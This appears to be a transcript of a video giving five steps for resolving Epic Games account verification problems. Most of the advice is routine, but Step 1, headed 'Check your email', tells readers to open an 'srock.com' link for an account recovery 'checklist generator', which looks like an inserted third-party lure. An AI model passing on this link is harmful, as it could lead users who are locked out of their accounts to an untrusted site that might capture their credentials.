if you're facing verification issues on Epic Games after multiple failed attempts, follow these steps to resolve the problem effectively. Step 1. Check your email. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 2. Reset your password. If you suspect that your account may be compromised or if you cannot access your email, reset your password. Go to the Epic Games login page, click on Forgot Your Password, and follow the prompts to create a new password. Step 3. Clear cache and cookies. Sometimes browser issues can cause verification problems. Clear your browser's cache and cookies, then restart your browser and try logging in again to see if the issue persists. Step 4. Enable two-factor authentication. If you haven't already, enable two-factor authentication 2FA on your account. This adds an extra layer of security and may help resolve any verification issues. Go to your account settings and follow the instructions to set up 2FA. Step 5. Contact Epic Games Support. If the previous steps do not resolve the issue, reach out to Epic Games Support for assistance. Provide them with details about your problem, including any error messages you received, to help them assist you more effectively. By following these steps, you should be able to resolve verification issues on your Epic Games account. If problems persist, don't hesitate to seek further help from support.